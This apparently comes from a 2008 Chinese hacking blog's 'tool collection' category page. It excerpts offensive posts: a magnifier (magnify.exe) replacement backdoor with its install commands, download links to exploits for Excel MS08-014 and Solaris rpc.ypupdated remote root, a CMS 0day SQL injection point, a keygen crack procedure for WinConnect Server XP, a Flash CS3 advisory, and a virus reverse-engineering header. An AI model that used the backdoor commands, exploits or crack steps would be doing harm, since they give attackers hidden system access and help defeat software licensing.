分类 ‘工具收集’ 下的日志

放大镜后门生成器

来源:红狼论坛
PS:刚刚在红狼论坛看到的,具体未测试…简单看了下,估计是类似以前那种 shift 后门差不多….
设本程序为ivy.exe则运行以下命令即可

copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe
copy ivy.exe %systemroot%\system32\magnify.exe
copy ivy.exe %systemroot%\system32\dllcache\magnify.exe

注:win+u,选择放大镜,输入你设定的后门启动密码,可执行cmd.exe和程序自己添加自定义用户(调用API防止cmd.exe被禁用)
阅读全文 »

Tags:

DNS批量溢出批处理代码

阅读全文 »

Tags:

Microsoft Office Excel Code Execution Exploit (MS08-014)

http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar

# milw0rm.com [2008-03-21]

Tags: , ,

[Advisory]Adobe Flash CS3 Pro FLA Parsing Vuls

by cocoruder([email protected])
http://ruder.cdut.net

Summary:

More than three local code execute vulnerabilities exist in Adobe Flash CS3 Professional while it is parsing FLA files. An attacker who successfully exploit these vulnerabilities can run arbitrary code on the affected system.

Affected Software Versions:

Adobe Flash CS3 Professional 9.0
阅读全文 »

Tags: , ,

Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit

//update: kcope/year2008
This is a bug discovered in 1994 still lurking
in the SunOS 5.10 source code tree, jummiiieh :)

Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit

http://www.milw0rm.com/sploits/2008-ypk2008.tar.gz

# milw0rm.com [2008-03-20]

Tags: , ,

CreateLive CMS Version 4.0 0day

来源:xn_ice的blog
CreateLive CMS Version 4.0 0day.doc
by:xiaok q:391232032.771044833 time: 2008-2-4 02:10 xpsp2 ie7 iis5.1 ……
致敬D.S.T的各位同志,致Hell-Phantom,致on thin ice,致老D,致Doom,致群里那帮有文化的流氓……

漏洞之一

来源kingcms\User\User_Comment.asp CommentID
sub SaveModify()

……
CommentID=Trim(Request("CommentID")) '注入
……
if CommentID="" then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>请指定评论ID</li>"
阅读全文 »

Tags: ,

WinConnect Server XP 多用户远程桌面服务器

来源:黑鹰

WinConnect Server XP能够安装在XP系统下(ps:本人在win2003系统下一样能用HAPPY!!),不受XP系统1用户远程连接限制,并最多支持21个客户端的同时并发连接数,支持24位真彩画面、音频传播,可自定连接方式,支持对客户端发送消息,支持有线或无线TCP/IP协议连接,例如LAN、WAN、 dial-up (Internet)、DSL\ADSL、ISDN、VPN,支持128位加密。每个客户端连接需要增加64MB内存。
破解方法:
1. 安装 V 2.00.204 版本原程序,重启。
2. 将patch目录下的文件拷贝到软件的安装目录下,并在当前目录下运行命令行程序,输入:
keygen.exe -r -u 21 或 直接运行register.cmd文件,重启。
阅读全文 »

“机器狗”病毒驱动部分逆向分析注释(C代码)

/*
标 题: 【原创】“机器狗”病毒驱动部分逆向分析注释(C代码)
作 者: dream2fly(QQ:838468959)
时 间: 2008.03.13 于深圳科技园
链 接; http://www.dream2fly.net
版 本: 1.0

【软件名称】: 机器狗(病毒)
【下载地址】: http://www.dream2fly.net 或 自己搜索下载
【加壳方式】: 未知壳
【编写语言】: MASM
【使用工具】: IDA
【操作平台】: win2003
【软件介绍】: 穿透冰点型带驱动病毒
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!

*/
阅读全文 »

Tags: